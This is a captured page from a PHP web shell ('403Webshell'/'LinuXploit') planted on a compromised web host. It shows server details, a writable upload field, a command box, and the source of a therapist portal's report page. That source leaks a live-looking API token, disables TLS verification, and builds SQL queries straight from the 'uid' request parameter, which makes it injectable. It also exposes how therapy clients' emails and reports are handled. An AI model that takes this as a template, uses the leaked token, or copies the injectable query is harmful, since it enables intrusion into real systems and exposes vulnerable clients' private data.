403Webshell
Server IP : 74.208.236.18  /  Your IP : 216.73.216.45
Web Server : Apache
System : Linux infong654 4.4.400-icpu-108 #2 SMP Wed Feb 11 10:12:42 UTC 2026 x86_64
User : u39365822 ( 135825)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /homepages/7/d147067425/htdocs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /homepages/7/d147067425/htdocs/view_reports.php
<?php 
session_start();
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);
if(!isset($_SESSION['loggedin']) && @$_SESSION['loggedin'] != '1'):
    header("Location:index.php");
endif;
include("includes/db_con_get.php");
$userID=$_SESSION['CURRENT_THERIPIST']['id'];
//print_r($_SESSION);

function get_reports($usersOnTool) {
    $url = 'http://apis.revealmyway.com:4000/therapist_api/public/api/thuser/reports';
    $curl = curl_init($url);
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);

    $headers = array(
    "X-Custom-Header: value",
    "Content-Type: application/json",
    "API-TOKEN:t68VRoQGFSxHVR3dskZvRKpe8Pb1rQrm",
    );
    curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
    $fields = $usersOnTool;
    //$currentUserId = @$_SESSION['CURRENT_CLIENT']['UserID'];
    //$currentUserId = 'b500aebd-69fe-47fe-91ee-693d650de9f9';
    //$fields['id'] = @$currentUserId ? $currentUserId : '';
    // Api call footer
    curl_setopt($curl, CURLOPT_POSTFIELDS, json_encode($fields));
    //for debug only!
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);

    $resp = curl_exec($curl);
    curl_close($curl);
    $response = json_decode($resp);
    return $response;
}
if(@isset($_GET['uid']) && @$_GET['uid'] !== '') {
    $where = "AND `UserID` = '".$_GET['uid']."'";
}
$get_users = mysqli_query($con, "SELECT `UserID`, `EmailID`, `GuidReference` FROM `user` WHERE `therapist_id` = '".@$userID."' ".@$where." ORDER BY `CreatedOn` ASC") or die(mysqli_error($con));

$usersOnTool = array();
if(mysqli_num_rows($get_users) > 0) {
    $i=0;
    while($cw = mysqli_fetch_assoc($get_users)) {
        //$usersOnTool[] = $cw;
        $usersOnTool[$i]['UserID'] = $cw['UserID'];
        $usersOnTool[$i]['EmailID'] = base64_decode($cw['EmailID']);
        $usersOnTool[$i]['GuidReference'] = $cw['GuidReference'];
        $i++;
    }
}

$user_reports = get_reports($usersOnTool);

//echo '<pre>'; print_r($user_reports); echo '</pre>';
//exit;
?>

<!DOCTYPE html>
<html lang="en">
    <?php include("includes/header.php"); ?>
    <body class="sb-nav-fixed">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.4.0/css/font-awesome.css" integrity="sha512-DD6Lm09YDHzhW3K4eLJ9Y7sFrBwtCF+KuSWOLYFqKsZ6RX4ifCu9vWqM4R+Uy++aBWe6wD4csgQRzGKp5vP6tg==" crossorigin="anonymous" referrerpolicy="no-referrer" />

    <style>
    .table a{
    display:block;
    text-decoration:none;
    }    
    </style>   
    <?php include("includes/topnavbar.php"); ?>
    <div id="layoutSidenav">
    <?php include("includes/sidenavbar.php"); ?>
    <div id="layoutSidenav_content">
    <main>
                    <div class="container-fluid px-4">
                    <h3 class="mt-4">View All Reports</h3>
                    </br>
                    <div class="card mb-4">
                    <div class="card-header py-3">
                    <div class="row">
                    <div class="col-md-10">
                    <i class="fas fa-table me-1"></i>View All Reports</div>
                    <div class="col-md-2">
                    <a href="dashboard.php" class="btn  btn-primary" style="font-size:15px;" ><i class="fas fa-arrow-left"></i> Return to Dashboard</a>
                    </div>
					</div>
                    </div>

                    <div class="card-body">
                    <table class="table table-bordered text-center">
                    <thead>
                    <tr>
                    <th>Client</th>
                    <th>File Type</th>
                    <th>File Name</th>
                    <th>Created On</th>
                    </tr>
                    </thead>
                    <tbody>
                        <?php if(@!empty($user_reports)) {?>
                            <?php foreach($user_reports as $k=>$v) { 
                            if(!empty($v)) {        
                        ?>
                        <tr>
                            <th><?php 
                            $qname = mysqli_query($con, "SELECT `UserName` FROM `user` WHERE `UserID` = '$k'") or die(mysqli_error($con));
                            $uname = mysqli_fetch_assoc($qname);
                            echo @base64_decode($uname['UserName']);
                            ?></th>
                            <td><?php foreach($v as $kk=>$vv) {?>
                                    <p>
                                        <a target="_blank" href="http://s147067457.onlinehome.us/RevealReports/<?=@$vv->FileName?>">
                                        <?php 
                                        if(@str_contains($vv->FileType, "PRO")) {
                                            echo @str_replace("PRO","WellBeing Profiler", str_replace("-p", "", $vv->FileType));
                                        } else if(@str_contains($vv->FileType, "PMG")) {
                                            echo @str_replace("PMG","Problem Management Guide", str_replace("-p", "", $vv->FileType));    
                                        } else if(@str_contains($vv->FileType, "PP")) {
                                            echo @str_replace("PP","Periodic Profiler", str_replace("-p", "", $vv->FileType));    
                                        }
                                        ?>
                                        </a>
                                    </p>
                                <?php } ?></td>
                            <td><?php foreach($v as $kk=>$vv) { ?>
                                    <p><a target="_blank" href="http://s147067457.onlinehome.us/RevealReports/<?=@$vv->FileName?>"><?=@$vv->FileName?></a></p>
                                <?php }?></td>
                            <td><?php foreach($v as $kk=>$vv) {?>
                                    <p><a target="_blank" href="http://s147067457.onlinehome.us/RevealReports/<?=@$vv->FileName?>"><?=@date("m/d/Y h:i A", strtotime($vv->CreatedOn))?></a></p>
                                <?php }?></td>
                        </tr>
                            <?php } ?>
                                
                            <?php } ?>
                        <?php } else {?>
                            <tr><td colspan="4">No reports found.</td></tr>
                        <?php } ?> 
                    </tbody>
                    </table>   
                                
                    </div>
                    </div>
                    </main>
<?php include("includes/footer.php"); ?>
</div>
</div>
<?php include("includes/footer_js.php"); ?>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit